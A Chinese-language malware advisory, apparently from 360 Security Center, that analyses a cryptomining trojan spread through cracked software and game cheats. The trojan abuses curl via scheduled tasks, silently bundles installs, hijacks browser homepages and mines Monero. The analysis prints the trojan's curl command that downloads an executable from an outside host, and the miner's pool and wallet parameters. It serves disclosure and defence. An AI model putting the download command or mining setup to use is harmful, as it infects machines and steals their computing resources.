开源工具遭利用，新型挖矿木马兼职“软件推销员”

近日，360安全中心监测到一类新型的挖矿木马在国内和国外都非常活跃，单日拦截量高达30万。此类挖矿木马利用了开源工具Curl.exe，或是wget.exe，带上参数（木马下载地址）使得恶意代码隐藏在系统计划任务中，因此很多杀毒软件都无法扫描出此类木马病毒。该木马病毒在感染用户计算机后，先是在用户电脑上静默安装至少七八个软件，其次还会篡改用户浏览器首页，这还没完，最后该木马会下载一个挖矿程序到用户电脑上，然后在后台偷偷执行挖矿。由于此类木马病毒利用了白文件，兼顾挖矿和静默安装软件，并且“作案手法”兜兜转转，因此，360安全中心的研究员把此类挖矿木马命名为CurlSoftwareBundlerMiner。

经过研究员对此类病毒的解析发现，该木马病毒的来源主要是用户下载的各种软件破解器，外挂等工具在设备上运行所致。以下为研究员对此类挖矿木马做出的分析：

1.用户在运行带有木马恶意代码的程序后，该木马安装包开始解密并且执行木马关键代码，接着会下载并释放Curl白利用文件，创建计划任务。

（图：释放Curl白利用文件）

（图：创建计划任务）

2.创建的计划任务项目有两个，其中第一个为Curl，其对应的执行文件为curl_7_54.exe，该文件为开源工具Curl.exe 带参数-f -s -L http://atotum.ru/f.exe -o "%UserProfile%\AppData\Roaming\curl\curl.exe"，此计划任务被触发后会下载一个木马到"%UserProfile%\AppData\Roaming\curl\curl.exe"，而后会被Curls（第二个）计划任务触发并执行。如果说第一个计划任务是为攻击用户电脑做准备工作，那么第二个计划任务的主要功能就是实施一系列具体的攻击行为了。这些攻击行为主要包括下载挖矿木马、推广各种软件（静默安装）、和修改用户浏览器主页获利。

（图：两个计划任务项目）

3.木马开始释放第一个下载器，并且传入参数运行下载安装。

第一个下载器中的1.tmp.exe 带有正常的LLC Mail.Ru签名，是木马病毒可以下载na_runner.exe –install 实施静默安装，添加启动项，修改浏览器主页。

（图：正常的LLC Mail.Ru签名）

（图：静默安装）

（图：篡改用户浏览器主页）

4.接下来木马会释放第二个下载器传入参数运行下载安装，与第一个相同的是8.temp.exe也携带了LLC Mail.Ru签名，不同的是，这次静默安装的是一个浏览器。

5.最后开始在用户电脑上下载安装挖矿木马，这个挖矿木马带有TOV "RED TABURET"正常的数字签名。该数字签名使得挖矿木马可以将自身拷贝到C:\WINDOWS\Microsoft\svchost.exe 后伪装成添加服务运行，而实则进行XMR挖矿。

-a cryptonight

-o stratum+tcp://mine.moneropool.com:3333

-u 4B9Darzi85pHxc53y1KZ6BHpFhdFSbTMYHMbK5BCByM36HsbsXqVzHYHwkybR1272oaZ4zPJ2EP79bw4dRUJR9pLSebAhDM -p x

（图：正常的数字签名）

（图：拷贝自身到C:\WINDOWS\Microsoft\svchost.exe）

（图：伪装为服务）

（图：实施挖矿）

相关文件md5
f81069b5b3f7d8274e563a628929cde2
4dbc6848a826c4e98587d8fecf390a47
cf464d1f8ff321a74fddb4e00c20876a 
安全提醒
此次的新型木马由于非常活跃，单日拦截量高达30万，所以潜在的受害者也可能高于以往。一旦用户的电脑感染了此类“捆绑式攻击”的挖矿木马，会给用户使用电脑带来极大的不便和更多潜在威胁。360安全团队建议用户，一旦发现电脑卡慢，或是任何异常现象请及时使用安全软件扫描，保证安全软件处于开启状态。

安装了360安全卫士的用户请放心，即使在360安全卫士关闭状态下不慎中招，也可尽快开启进行查杀清除木马。360安全卫士已推出了挖矿木马防护功能，全面防御从各种渠道入侵的挖矿木马。用户开启了该功能后，360安全卫士将会实时拦截各类挖矿木马的攻击，为用户计算机安全保驾护航。